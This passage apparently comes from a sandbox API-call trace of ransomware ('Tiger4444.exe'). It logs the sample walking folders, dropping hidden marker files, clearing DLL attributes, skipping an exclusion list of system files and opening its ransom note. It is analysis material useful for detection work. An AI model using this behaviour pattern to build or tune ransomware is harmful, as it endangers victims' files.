dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0044.680] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.680] CloseHandle (hObject=0x260) returned 1 [0044.680] CloseHandle (hObject=0x2ac) returned 1 [0044.680] GetCurrentThreadId () returned 0xfa8 [0044.680] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66308 [0044.680] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Windows10Upgrade\\dll2", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\dll2") returned="C:\\Windows10Upgrade\\dll2" [0044.681] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73048 | out: hHeap=0xc50000) returned 1 [0044.681] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66300 | out: hHeap=0xc50000) returned 1 [0044.681] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\dll2" | out: lpString1="C:\\Windows10Upgrade\\dll2") returned="C:\\Windows10Upgrade\\dll2" [0044.681] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\dll2", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\dll2\\") returned="C:\\Windows10Upgrade\\dll2\\" [0044.681] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\dll2\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\dll2\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\dll2\\.BFC0E91B00AE8A0620D3" [0044.681] CreateFileW (lpFileName="C:\\Windows10Upgrade\\dll2\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\dll2\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0044.682] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0044.684] FlushFileBuffers (hFile=0x2ac) returned 1 [0044.685] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\dll2\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0044.685] CloseHandle (hObject=0x2ac) returned 1 [0044.686] lstrlenW (lpString="C:\\Windows10Upgrade\\dll2") returned 24 [0044.686] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0044.686] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\dll2\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea37cd05, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea37cd05, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x7fa6cd1b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73208 [0044.686] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.686] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.686] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0044.686] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0044.686] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea37cd05, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea37cd05, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x7fa6cd1b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.686] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.686] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.686] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0044.686] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0044.686] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0044.686] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7fa6cd1b, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7fa6cd1b, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7fa6cd1b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0044.686] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.686] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0044.686] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea37e09b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea37e09b, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xb8400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="webservices.dll", cAlternateFileName="WEBSER~1.DLL")) returned 1 [0044.686] lstrcmpiW (lpString1="webservices.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0044.686] lstrcmpiW (lpString1="webservices.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.686] lstrcmpiW (lpString1="webservices.dll", lpString2="Tiger4444.exe") returned 1 [0044.686] lstrcmpiW (lpString1="webservices.dll", lpString2=".") returned 1 [0044.686] lstrcmpiW (lpString1="webservices.dll", lpString2="..") returned 1 [0044.686] lstrcmpiW (lpString1="webservices.dll", lpString2="windows") returned -1 [0044.686] lstrcmpiW (lpString1="webservices.dll", lpString2="bootmgr") returned 1 [0044.686] lstrcmpiW (lpString1="webservices.dll", lpString2="pagefile.sys") returned 1 [0044.686] lstrcmpiW (lpString1="webservices.dll", lpString2="boot") returned 1 [0044.687] lstrcmpiW (lpString1="webservices.dll", lpString2="ids.txt") returned 1 [0044.687] lstrcmpiW (lpString1="webservices.dll", lpString2="NTUSER.DAT") returned 1 [0044.687] lstrcpyW (in: lpString1=0x30aeada, lpString2="webservices.dll" | out: lpString1="webservices.dll") returned="webservices.dll" [0044.687] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\dll2\\webservices.dll", dwFileAttributes=0x0) returned 1 [0044.687] lstrlenW (lpString="webservices.dll") returned 15 [0044.687] lstrlenW (lpString="Tiger4444") returned 9 [0044.687] lstrcmpiW (lpString1="vices.dll", lpString2="Tiger4444") returned 1 [0044.687] lstrlenW (lpString=".dll") returned 4 [0044.687] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0044.687] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea37e09b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea37e09b, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xb8400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="webservices.dll", cAlternateFileName="WEBSER~1.DLL")) returned 0 [0044.687] FindClose (in: hFindFile=0xc73208 | out: hFindFile=0xc73208) returned 1 [0044.687] lstrcpyW (in: lpString1=0x30aeada, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0044.687] CreateFileW (lpFileName="C:\\Windows10Upgrade\\dll2\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\dll2\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0044.689] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0044.689] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0044.690] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.690] CloseHandle (hObject=0x260) returned 1 [0044.690] CloseHandle (hObject=0x2ac) returned 1 [0044.691] GetCurrentThreadId () returned 0xfa8 [0044.691] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc664c8 [0044.691] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Windows10Upgrade\\dll1", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\dll1") returned="C:\\Windows10Upgrade\\dll1" [0044.691] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72fc8 | out: hHeap=0xc50000) returned 1 [0044.691] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc664c0 | out: hHeap=0xc50000) returned 1 [0044.691] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\dll1" | out: lpString1="C:\\Windows10Upgrade\\dll1") returned="C:\\Windows10Upgrade\\dll1" [0044.691] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\dll1", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\dll1\\") returned="C:\\Windows10Upgrade\\dll1\\" [0044.691] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\dll1\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\dll1\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\dll1\\.BFC0E91B00AE8A0620D3" [0044.691] CreateFileW (lpFileName="C:\\Windows10Upgrade\\dll1\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\dll1\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0044.705] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0044.708] FlushFileBuffers (hFile=0x2ac) returned 1 [0044.710] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\dll1\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0044.710] CloseHandle (hObject=0x2ac) returned 1 [0044.711] lstrlenW (lpString="C:\\Windows10Upgrade\\dll1") returned 24 [0044.711] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0044.711] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\dll1\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3757e9, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea377ed3, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x7fab5e29, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d08 [0044.711] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.711] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.711] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0044.711] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0044.711] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3757e9, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea377ed3, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x7fab5e29, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.711] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.711] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.711] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0044.711] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0044.711] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0044.711] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7fab21e8, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7fab21e8, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7fabfa4c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0044.711] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.711] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0044.711] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea376b75, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea376b75, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x204c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cosqueryxp.dll", cAlternateFileName="COSQUE~1.DLL")) returned 1 [0044.711] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.711] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.711] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2="Tiger4444.exe") returned -1 [0044.711] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2=".") returned 1 [0044.711] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2="..") returned 1 [0044.711] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2="windows") returned -1 [0044.711] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2="bootmgr") returned 1 [0044.711] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2="pagefile.sys") returned -1 [0044.711] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2="boot") returned 1 [0044.711] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2="ids.txt") returned -1 [0044.711] lstrcmpiW (lpString1="cosqueryxp.dll", lpString2="NTUSER.DAT") returned -1 [0044.711] lstrcpyW (in: lpString1=0x30aeada, lpString2="cosqueryxp.dll" | out: lpString1="cosqueryxp.dll") returned="cosqueryxp.dll" [0044.712] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\dll1\\cosqueryxp.dll", dwFileAttributes=0x0) returned 1 [0044.712] lstrlenW (lpString="cosqueryxp.dll") returned 14 [0044.712] lstrlenW (lpString="Tiger4444") returned 9 [0044.712] lstrcmpiW (lpString1="eryxp.dll", lpString2="Tiger4444") returned -1 [0044.712] lstrlenW (lpString=".dll") returned 4 [0044.712] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0044.712] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea377ed3, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea377ed3, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x3b0c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wdscore.dll", cAlternateFileName="")) returned 1 [0044.712] lstrcmpiW (lpString1="wdscore.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0044.712] lstrcmpiW (lpString1="wdscore.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.712] lstrcmpiW (lpString1="wdscore.dll", lpString2="Tiger4444.exe") returned 1 [0044.712] lstrcmpiW (lpString1="wdscore.dll", lpString2=".") returned 1 [0044.712] lstrcmpiW (lpString1="wdscore.dll", lpString2="..") returned 1 [0044.712] lstrcmpiW (lpString1="wdscore.dll", lpString2="windows") returned -1 [0044.712] lstrcmpiW (lpString1="wdscore.dll", lpString2="bootmgr") returned 1 [0044.712] lstrcmpiW (lpString1="wdscore.dll", lpString2="pagefile.sys") returned 1 [0044.712] lstrcmpiW (lpString1="wdscore.dll", lpString2="boot") returned 1 [0044.712] lstrcmpiW (lpString1="wdscore.dll", lpString2="ids.txt") returned 1 [0044.712] lstrcmpiW (lpString1="wdscore.dll", lpString2="NTUSER.DAT") returned 1 [0044.712] lstrcpyW (in: lpString1=0x30aeada, lpString2="wdscore.dll" | out: lpString1="wdscore.dll") returned="wdscore.dll" [0044.712] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\dll1\\wdscore.dll", dwFileAttributes=0x0) returned 1 [0044.717] lstrlenW (lpString="wdscore.dll") returned 11 [0044.717] lstrlenW (lpString="Tiger4444") returned 9 [0044.717] lstrcmpiW (lpString1="score.dll", lpString2="Tiger4444") returned -1 [0044.717] lstrlenW (lpString=".dll") returned 4 [0044.717] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0044.717] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea37926f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea37926f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0xe9ec8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="webservices.dll", cAlternateFileName="WEBSER~1.DLL")) returned 1 [0044.717] lstrcmpiW (lpString1="webservices.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0044.717] lstrcmpiW (lpString1="webservices.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.717] lstrcmpiW (lpString1="webservices.dll", lpString2="Tiger4444.exe") returned 1 [0044.717] lstrcmpiW (lpString1="webservices.dll", lpString2=".") returned 1 [0044.717] lstrcmpiW (lpString1="webservices.dll", lpString2="..") returned 1 [0044.718] lstrcmpiW (lpString1="webservices.dll", lpString2="windows") returned -1 [0044.718] lstrcmpiW (lpString1="webservices.dll", lpString2="bootmgr") returned 1 [0044.718] lstrcmpiW (lpString1="webservices.dll", lpString2="pagefile.sys") returned 1 [0044.718] lstrcmpiW (lpString1="webservices.dll", lpString2="boot") returned 1 [0044.718] lstrcmpiW (lpString1="webservices.dll", lpString2="ids.txt") returned 1 [0044.718] lstrcmpiW (lpString1="webservices.dll", lpString2="NTUSER.DAT") returned 1 [0044.718] lstrcpyW (in: lpString1=0x30aeada, lpString2="webservices.dll" | out: lpString1="webservices.dll") returned="webservices.dll" [0044.718] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\dll1\\webservices.dll", dwFileAttributes=0x0) returned 1 [0044.719] lstrlenW (lpString="webservices.dll") returned 15 [0044.719] lstrlenW (lpString="Tiger4444") returned 9 [0044.719] lstrcmpiW (lpString1="vices.dll", lpString2="Tiger4444") returned 1 [0044.719] lstrlenW (lpString=".dll") returned 4 [0044.719] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0044.719] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea37926f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea37926f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0xe9ec8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="webservices.dll", cAlternateFileName="WEBSER~1.DLL")) returned 0 [0044.719] FindClose (in: hFindFile=0xc72d08 | out: hFindFile=0xc72d08) returned 1 [0044.719] lstrcpyW (in: lpString1=0x30aeada, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0044.719] CreateFileW (lpFileName="C:\\Windows10Upgrade\\dll1\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\dll1\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0044.720] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0044.720] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0044.720] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.720] CloseHandle (hObject=0x260) returned 1 [0044.720] CloseHandle (hObject=0x2ac) returned 1 [0044.722] GetCurrentThreadId () returned 0xfa8 [0044.722] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66528 [0044.722] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users", iMaxLength=2048 | out: lpString1="C:\\Users") returned="C:\\Users" [0044.722] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66360 | out: hHeap=0xc50000) returned 1 [0044.722] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66520 | out: hHeap=0xc50000) returned 1 [0044.722] lstrcatW (in: lpString1="", lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0044.722] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0044.722] lstrcatW (in: lpString1="C:\\Users\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\.BFC0E91B00AE8A0620D3" [0044.722] CreateFileW (lpFileName="C:\\Users\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0044.726] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0044.728] FlushFileBuffers (hFile=0x2ac) returned 1 [0044.730] SetFileAttributesW (lpFileName="C:\\Users\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0044.730] CloseHandle (hObject=0x2ac) returned 1 [0044.730] lstrlenW (lpString="C:\\Users") returned 8 [0044.730] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0044.730] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x7facd0de, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc730c8 [0044.730] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.730] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.730] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0044.731] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0044.731] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x7facd0de, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.731] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.731] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.731] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0044.731] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0044.731] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0044.731] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7facd0de, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7facd0de, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7facd0de, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0044.731] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.731] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0044.731] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd7b844b1, ftCreationTime.dwHighDateTime=0x1d2a02f, ftLastAccessTime.dwLowDateTime=0xd7b844b1, ftLastAccessTime.dwHighDateTime=0x1d2a02f, ftLastWriteTime.dwLowDateTime=0xd7b844b1, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0044.731] lstrcmpiW 